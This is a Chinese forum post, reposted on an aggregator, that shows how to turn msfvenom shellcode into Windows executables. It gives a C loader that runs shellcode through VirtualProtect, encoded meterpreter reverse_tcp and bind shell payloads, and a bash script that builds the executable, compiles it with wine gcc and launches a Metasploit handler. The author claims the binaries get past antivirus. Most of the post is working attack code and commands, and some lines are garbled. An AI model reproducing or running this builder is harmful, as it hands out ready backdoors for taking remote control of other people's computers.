概述
本帖最后由 Demon123 于 2017-9-20 15:15 编辑
install-openvas-for-broad-vulnerability-assessment.1280x600.jpg (84.8 KB, 下载次数: 40)
2017-9-20 15:10 上传
http://www.secist.com/archives/4809.html
1.我有一个大胆的想法
其实shellcode的这篇的灵感也是在与和车王两人的沟通,在他的带领下 也是才知道
1505477898281.png (166.99 KB, 下载次数: 38)
2017-9-20 14:58 上传
2.无心插柳柳成荫
1505478268488.png (148.93 KB, 下载次数: 45)
2017-9-20 14:59 上传
3.shellcode 弹窗hellword 警告窗口[Shell] 纯文本查看 复制代码# include
# include
# include
# include
int
main(void)
{
char *shellcode = "x33xc9x64x8bx49x30x8bx49x0cx8b"
"x49x1cx8bx59x08x8bx41x20x8bx09"
"x80x78x0cx33x75xf2x8bxebx03x6d"
"x3cx8bx6dx78x03xebx8bx45x20x03"
"xc3x33xd2x8bx34x90x03xf3x42x81"
"x3ex47x65x74x50x75xf2x81x7ex04"
"x72x6fx63x41x75xe9x8bx75x24x03"
"xf3x66x8bx14x56x8bx75x1cx03xf3"
"x8bx74x96xfcx03xf3x33xffx57x68"
"x61x72x79x41x68x4cx69x62x72x68"
"x4cx6fx61x64x54x53xffxd6x33xc9"
"x57x66xb9x33x32x51x68x75x73x65"
"x72x54xffxd0x57x68x6fx78x41x01"
"xfex4cx24x03x68x61x67x65x42x68"
"x4dx65x73x73x54x50xffxd6x57x68"
"x72x6cx64x21x68x6fx20x57x6fx68"
"x48x65x6cx6cx8bxccx57x57x51x57"
"xffxd0x57x68x65x73x73x01xfex4c"
"x24x03x68x50x72x6fx63x68x45x78"
"x69x74x54x53xffxd6x57xffxd0";
DWORD why_must_this_variable;
BOOL ret = VirtualProtect (shellcode, strlen(shellcode),
PAGE_EXECUTE_READWRITE, &why_must_this_variable);
if (!ret) {
printf ("VirtualProtectn");
return EXIT_FAILURE;
}
printf("strlen(shellcode)=%dn", strlen(shellcode));
((void (*)(void))shellcode)();
return EXIT_SUCCESS;
}
我们来手动的进行编译一下看看具体的效果如何 是不是和他说的一样 会弹框 (hello word)
91D81B3717235DAA0518E2443145D3D2.png (12.91 KB, 下载次数: 48)
2017-9-20 15:00 上传
4.得到的信息和回顾学过的知识
可以看到弹窗的内容是helloword ,也可以看到代码中并无helloword的字符串以及MessageBox 的调用,也就是相关重点的代码就在于shellcode的硬编码。
那么这就让我想到了msfVENOM的shellcode代码 ,由msfvenom生成的恶意的shellcode的。也就是以c生成shellcode硬编码。相关如何的msfvenom
1505482728515.png (792.74 KB, 下载次数: 44)
2017-9-20 15:00 上传
5.shellcode_msfvenom
本篇就以/www.offensive-security.com 中的msfvenom 教程为例
1505482827337.png (66.29 KB, 下载次数: 38)
2017-9-20 15:01 上传
[Shell] 纯文本查看 复制代码root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b 'x00' -i 3 -f python
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai succeeded with size 353 (iteration=1)
x86/shikata_ga_nai succeeded with size 380 (iteration=2)
x86/shikata_ga_nai chosen with final size 380
Payload size: 380 bytes
buf = ""
buf += "xbbx78xd0x11xe9xdaxd8xd9x74x24xf4x58x31"
buf += "xc9xb1x59x31x58x13x83xc0x04x03x58x77x32"
buf += "xe4x53x15x11xeaxffxc0x91x2cx8bxd6xe9x94"
buf += "x47xdfxa3x79x2bx1cxc7x4cx78xb2xcbxfdx6e"
buf += "xc2x9dx53x59xa6x37xc3x57x11xc8x77x77x9e"
buf += "x6dxfcx58xbax82xf9xc0x9ax35x72x7dx01x9b"
buf += "xe7x31x16x82xf6xe2x89x89x75x67xf7xaaxae"
buf += "x73x88x3fxf5x6dx3dx9exabx06xdaxffx42x7a"
buf += "x63x6bx72x59xf6x58xa5xfex3fx0bx41xa0xf2"
buf += "xfex2dxc9x32x3dxd4x51xf7xa7x56xf8x69x08"
buf += "x4dx27x8ax2ex19x99x7cxfcx63xfax5cxd5xa8"
buf += "x1fxa8x9bx88xbbxa5x3cx8fx7fx38x45xd1x71"
buf += "x34x59x84xb0x97xa0x99xccxfex7fx37xe2x28"
buf += "xeax57x01xcfxf8x1ex1exd8xd3x05x67x73xf9"
buf += "x32xbbx76x8cx7cx2fxf6x29x0fxa5x36x2ex73"
buf += "xdex31xc3xfexaex49x64xd2x39xf1xf2xc7xa0"
buf += "x06xd3xf6x1axfex0axfex28xbex1ax42x9cxde"
buf += "x01x16x27xbdx29x1cxf8x7dx47x2cx68x06x0e"
buf += "x23x31xfex7dx58xe8x7bx76x4bxfexdbx17x51"
buf += "xfaxdfxffxa1xbcxc5x66x4bxeax23x86x47xb4"
buf += "xe7xd5x71x77x2ex24x4ax3dxb1x6fx12xf2xb2"
buf += "xd0x55xc9x23x2exc2xa5x73xb2xc8xb7x7dx6b"
buf += "x55x29xbcx26xddxf6xe3xf6x25xc6x5cxadx9c"
buf += "x9dx18x08x3bxbfxd2xffx92x18x5fx48x9bxe0"
buf += "x7bx03xa5x32x11x27x2bx25xcdx44xdbxbdxb9"
buf += "xcdx48xdax56x4cx56xd5x04x87x48x3ax6bx9c"
buf += "x2ax15x4dxbcx0bx56x06xb5xc9x46xd0xfax68"
buf += "xa6x76xe9x52x2cx24x62x28xe1x1dx87xb0x66"
buf += "x93x85x8fx87x0fxcfx16x29x76x03x55x0cx0e"
buf += "x3fx17xac"
可以看到使用msfvenom 自动帮我们生成恶意的shellcode其中的-a 代表 的是目标的架构 如:x86
–platform 代表的是一个目标机的平台 如: windows
那么-p 呢 代表的是msf的payload的以及-e 和-b 呢 代表这个 encoder编码器,-b 表示去除硬编码中的0x00代码,因为0x00代表着结束的符号,所以我们不能让他出现0x00这个代码。
最后的 -i 和-f 分别代表的是iterations和format (迭代次数和格式)
那么我们将其代码重新改改,我们比如需要的功能是meterperter、指定ip和端口、指定shellcode 编码格式如:c或者python等代码
[Shell] 纯文本查看 复制代码msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击者IP地址 LPORT=攻击者端口 -e x86/shikata_ga_nai -b 'x00' -i 迭代次数 -f c
那么简短来说就是
[Shell] 纯文本查看 复制代码-p去指定payload为 windows/meterpreter/reverse_tcp
LHOST 和LPORT 指定攻击者ip和端口
-e指定x86/shikata_ga_nai 编码器
-i 指定迭代为如 5次 或10次等
-f 指定输出的格式 如c 代码 、或者python等其他格式的代码
-f参数可以参考msfvenom的帮助参数 查看-f的支持格式
1505484222188.png (159 KB, 下载次数: 42)
2017-9-20 15:02 上传
6.shellcode_c_msf
最终我们可以得到由msfvenom 生成C的shellcode代码
[Shell] 纯文本查看 复制代码msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -b 'x00' -i 4 -f c
Found 1 compatible encoders
Attempting to encode payload with 4 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai chosen with final size 441
Payload size: 441 bytes
Final size of c file: 1878 bytes
unsigned char buf[] =
"xd9xe1xbfxc4xbdx41x38xd9x74x24xf4x5ex31xc9xb1"
"x68x31x7ex19x83xeexfcx03x7ex15x26x48x9axecx1c"
"x99x40x70xddx07x0exaexe9xe6xc6x67xa0x76x28x2e"
"xd8x7bx1cxd4x5fx95x5cx0ax80xedx24xafx55xeexe0"
"xf9x80x7fx1ax88x1fxdexbaxa7x09x17x25x1fx2cx37"
"x5dx53x6cx7ax01xd2x99x69x5bx61x14x0axe1x2bxe1"
"x62x0cx07x9bx67xe4x56x2fxf8xa0x7exddxfex6dx0f"
"xa2x0exfcx24xcdxcexc0xa3x8bx96xe5x1bx26xbdx58"
"x8dxccx2bx71xe4x37xdaxb7xcax2exe1xe2x19xd9xbf"
"x29x5cxedx2bx32x0fx9fx81x59xf9x3bx31x57xe1x38"
"x75x55xa9xa8x30x8exa2x1ex9ex65xaax5fxe7x43xc7"
"x1ex06xc7x6dx0fxb8x09xf1xa7xaax3ex82xb0xf5x7e"
"xf6x08xe1x90xc5x98xd0x11xe9x78xd6xa6x44xf4x1a"
"xe9x7dx83xecx57xd9xb5x80x0bx5fx98xc8xecxebx3f"
"x09x17xc8xadx8ax5fxc6x6fx8fxa3x11x7cx7cx3ex25"
"x44x62xbdxd3x94xe8x0bx3exd9xbex05x71x89x98x6b"
"xe3x4ax36x34x9exa6x90xeex69x13x16xa0x9axf5x68"
"x53x22xdcx6fx59x54x53x8ax25x31x40x3ex03x85xc9"
"x3bx1cxb9xb1x6bxe9x42xecxdax5fx24x8ax81x37x90"
"xe3xb0xe8xd7xfex8exfcx0bxc4xdex75x73x40x14x24"
"x2cx03xf0xfdx65x7cxbfxe8xd3xa2x80x16xd1x32x36"
"x36x30x1ex71x4fxe9x60x47x91xcfx0cxf0xebxc3xe6"
"xbfx98x1ax3ax38xfax56x40x9ex4ex51xc2xcbxc2x48"
"xe5xbfx0dxecxb2x37x01x9fx7axdfx3axdex30xe0x04"
"xb6x07x5ex5cx65x1cxfdx24x02xbdx8fx2cxbaxdcxbd"
"x27x2axe0x08x74xf9xdax8bx4axafx46xafx67xd1x42"
"x9dxb5x11x70xd7x5cxf0x36x1fx87x42x99xa4x57x64"
"x8fxf7xdax03x42x35x85x6exd5x6bxa6xcdxdbx8cx2f"
"x37x62xefxfex61xabxebxdex37xd8x5ex77x7fx86x18"
"x88x80xd4x02xe7x8b";
1505484635934.png (217.97 KB, 下载次数: 36)
2017-9-20 15:03 上传
7.编译、监听、运行
那么我们得了到了msfvenom生成的shellcode,那么我们将其带入之前弹框的hellword代码中,写出以下代码:
[Shell] 纯文本查看 复制代码# include
# include
# include
# include
int
main(void)
{
char *shellcode =
#Shellcode的代码
"xd9xe1xbfxc4xbdx41x38xd9x74x24xf4x5ex31xc9xb1"
"x68x31x7ex19x83xeexfcx03x7ex15x26x48x9axecx1c"
"x99x40x70xddx07x0exaexe9xe6xc6x67xa0x76x28x2e"
"xd8x7bx1cxd4x5fx95x5cx0ax80xedx24xafx55xeexe0"
"xf9x80x7fx1ax88x1fxdexbaxa7x09x17x25x1fx2cx37"
"x5dx53x6cx7ax01xd2x99x69x5bx61x14x0axe1x2bxe1"
"x62x0cx07x9bx67xe4x56x2fxf8xa0x7exddxfex6dx0f"
"xa2x0exfcx24xcdxcexc0xa3x8bx96xe5x1bx26xbdx58"
"x8dxccx2bx71xe4x37xdaxb7xcax2exe1xe2x19xd9xbf"
"x29x5cxedx2bx32x0fx9fx81x59xf9x3bx31x57xe1x38"
"x75x55xa9xa8x30x8exa2x1ex9ex65xaax5fxe7x43xc7"
"x1ex06xc7x6dx0fxb8x09xf1xa7xaax3ex82xb0xf5x7e"
"xf6x08xe1x90xc5x98xd0x11xe9x78xd6xa6x44xf4x1a"
"xe9x7dx83xecx57xd9xb5x80x0bx5fx98xc8xecxebx3f"
"x09x17xc8xadx8ax5fxc6x6fx8fxa3x11x7cx7cx3ex25"
"x44x62xbdxd3x94xe8x0bx3exd9xbex05x71x89x98x6b"
"xe3x4ax36x34x9exa6x90xeex69x13x16xa0x9axf5x68"
"x53x22xdcx6fx59x54x53x8ax25x31x40x3ex03x85xc9"
"x3bx1cxb9xb1x6bxe9x42xecxdax5fx24x8ax81x37x90"
"xe3xb0xe8xd7xfex8exfcx0bxc4xdex75x73x40x14x24"
"x2cx03xf0xfdx65x7cxbfxe8xd3xa2x80x16xd1x32x36"
"x36x30x1ex71x4fxe9x60x47x91xcfx0cxf0xebxc3xe6"
"xbfx98x1ax3ax38xfax56x40x9ex4ex51xc2xcbxc2x48"
"xe5xbfx0dxecxb2x37x01x9fx7axdfx3axdex30xe0x04"
"xb6x07x5ex5cx65x1cxfdx24x02xbdx8fx2cxbaxdcxbd"
"x27x2axe0x08x74xf9xdax8bx4axafx46xafx67xd1x42"
"x9dxb5x11x70xd7x5cxf0x36x1fx87x42x99xa4x57x64"
"x8fxf7xdax03x42x35x85x6exd5x6bxa6xcdxdbx8cx2f"
"x37x62xefxfex61xabxebxdex37xd8x5ex77x7fx86x18"
"x88x80xd4x02xe7x8b";
DWORD why_must_this_variable;
BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
PAGE_EXECUTE_READWRITE, &why_must_this_variable);
if (!ret) {
printf("VirtualProtectn");
return EXIT_FAILURE;
}
((void(*)(void))shellcode)();
return 0;
}
编译可以使用vs微软的编译器也可以和我一样使用tdm-gcc。使用TDM-GCC 虽然有报错 ,但是也不影响最终得到会话的结果
其中的-M32 代表指的是32位 以及-W -Wall 是忽略警告的意思,其他的我就不用多说了吧
也可以使用vs进行编译生成exe。
1505485668396.png (62.16 KB, 下载次数: 44)
2017-9-20 15:04 上传
1505485903488.png (134.25 KB, 下载次数: 33)
2017-9-20 15:05 上传
以下是我在win下编译运行测试得到的结果,也是同样绕过杀软的安全防护
CACE2616E540CCD26C7E328C258F10AA.jpg (248.43 KB, 下载次数: 48)
2017-9-20 15:05 上传
8.Bash下的编写思路形成懒人自动化的脚本
我们要考虑几点内容:如何将我们生成的shellcode代码代入到cpp当中
如何指定ip和端口 自动化的帮我们完成所有事情
如何将我们生成的shellcode代码代入到cpp当中
其实我们可以使用echo结合$变量符大法将其重定向到缓存文件中去,如下所示
1505486902561.png (277.88 KB, 下载次数: 42)
2017-9-20 15:06 上传
[Shell] 纯文本查看 复制代码echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORTta_ga_nai -b 'x00' -i 4 -f c) >> shellcode.txt
写到缓存文件我们是不是马上可以放入到cpp中去呢?其实不是 细心的朋友可以发现shellcode.txt中包含着 unsigned char buf[] = 的字符串。所以我们需要用的一个命令 => sed ,使用sed 删除匹配unsigned char buf[] = 的字符串,也就是说得到以下命令
[Shell] 纯文本查看 复制代码sed 's/unsigned char buf[] =//g'
完整命令
[Shell] 纯文本查看 复制代码echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORTta_ga_nai -b 'x00' -i 4 -f c) | sed 's/unsigned char buf[] =//g' >> shellcode.txt
第一个问题解决了 讲msfvenom的shellcode存储到缓存文件中 ,那么我们需要得到完整的cpp文件该如何做呢?
[Shell] 纯文本查看 复制代码echo $(msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORTta_ga_nai -b 'x00' -i 4 -f c) | sed 's/unsigned char buf[] =//g' >> shellcode.txt
echo "
# include
# include
# include
# include
int
main(void)
{
char *shellcode =
$Shellcode
DWORD why_must_this_variable;
BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
PAGE_EXECUTE_READWRITE, &why_must_this_variable);
if (!ret) {
printf("VirtualProtectn");
return EXIT_FAILURE;
}
((void(*)(void))shellcode)();
return 0;
}
" >> output/shellcode.cpp
我们将得到的shellcode.txt 使用cat命令 将它输出 并且存储在一个变量中,如我使用的变量$shellcode,并将其变量代入到c代码中去这样也就完整的输出成我们想要的编译文件。
那么我们又如何指定ip和端口自动化的帮我们完成所有事情呢?在bash编程中我们使用read语法 ,read 就是接受用户键入的字符串。那么我们可以将其写成这样的:
[Shell] 纯文本查看 复制代码echo -e " secist>请输入你的ip地址: c"
read ip
echo -e " secist>请输入你的端口: c"
read port
echo -e " secist>编码次数(1-500): c"
read encode
分别将ip地址、端口、编码迭代次数。存储到ip、port、encode变量中。
9.开启上帝视角
最终我的个人完整代码为:
[Shell] 纯文本查看 复制代码shellcode (){[/size][/font][/color][/align]clear
echo -e ” < Shellcode Payload >”
echo -e ” ——————–”
echo -e ” ^__^ ”
echo -e ” (oo)_______ ”
echo -e ” (__) )/ ”
echo -e ” ||—-w | ”
echo -e ” || || ”
echo ” ”
echo -e ” +————++————————-++———————–+”
echo ” 即刻安全周年庆版v1.7 (secist—-2017.7.14)”
echo ” ”
echo -e ” 你的IP地址 :c”
/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk ‘{print $2}’|tr -d “addr:”
echo ” 系统版本 :$(cat /etc/issue)”
echo -e ” +————++————————-++———————–+”
echo ” ”
echo ” [1] Meterpreter_Reverse_tcp [5] Shell_reverse_tcp”
echo ” [2] Meterpreter_Reverse_http [6] exit”
echo ” [3] Meterpreter_Reverse_https ”
echo ” [4] Meterpreter_Reverse_tcp_dns ”
echo ” [7] back meun ”
echo “”
echo -e ” secist> c”
read option
#Aukeratu
case $option in
1)
payload=’windows/meterpreter/reverse_tcp’
;;
2)
payload=’windows/meterpreter/reverse_http’
;;
3)
payload=’windows/meterpreter/reverse_https’
;;
4)
payload=’windows/meterpreter/reverse_tcp_dns’
;;
5)
payload=’windows/shell/reverse_tcp’
;;
6)
exit
;;
7)
menu
;;
*)
shellcode
;;
esac
if [ “$option” == “1” ]; then
shellcode1
elif [ “$option” == “2” ]; then
shellcode1
elif [ “$option” == “3” ]; then
shellcode1
elif [ “$option” == “4” ]; then
shellcode1
elif [ “$option” == “5” ]; then
shellcode1
elif [ “$option” == “6” ]; then
exit
elif [ “$option” == “7” ]; then
menu
fi
}
shellcode1(){
#定义了一个菜单为shellcode1
echo -e ” secist>请输入你的ip地址: c”
read ip
echo -e ” secist>请输入你的端口: c”
read port
echo -e ” secist>编码次数(1-500): c”
read encode
echo $( msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -b ‘x00’ -i $encode -f c) | sed ‘s/unsigned char buf[] =//g’ >> output/shellcode.txt
Shellcode=$(cat output/shellcode.txt)
echo ”
# include
# include
# include
# include
int
main(void)
{
char *shellcode =
$Shellcode
DWORD why_must_this_variable;
BOOL ret = VirtualProtect(shellcode, strlen(shellcode),
PAGE_EXECUTE_READWRITE, &why_must_this_variable);
if (!ret) {
printf(”VirtualProtectn”);
return EXIT_FAILURE;
}
((void(*)(void))shellcode)();
return 0;
}
” >> output/shellcode.cpp
wine gcc -m32 -W -Wall -o output/shellcode.exe output/shellcode.cpp
rm output/shellcode.txt output/shellcode.cpp
echo -e ” +————++————————-++———————–+”
echo -e ” | Name || Descript || Your Input ”
echo -e ” +————++————————-++———————–+”
echo -e ” | LHOST || The Listen Addres || $ip ”
echo -e ” | LPORT || The Listen Ports || $port ”
echo -e ” | OUTPUTNAME || The Filename output || output/shellcode.exe ”
echo -e ” +————++————————-++———————–+”
echo “use exploit/multi/handler” >> resource/handler.rc
echo “set PAYLOAD $payload” >> resource/handler.rc
echo “set LHOST $ip” >> resource/handler.rc
echo “set LPORT $port” >> resource/handler.rc
echo “exploit ” >> resource/handler.rc
msfconsole -r resource/handler.rc
}
*在GitHub中我已经上传了相关的脚本文件,大家可以自行下载。同时,也希望大家能持续关注我们即刻安全未来的动态!谢谢!
最后
以上就是端庄背包为你收集整理的kali 如何编写shell_我的shellcode编写之路|MSF|Shellcode|kali linux 2017_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度....的全部内容,希望文章能够帮你解决kali 如何编写shell_我的shellcode编写之路|MSF|Shellcode|kali linux 2017_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度....所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复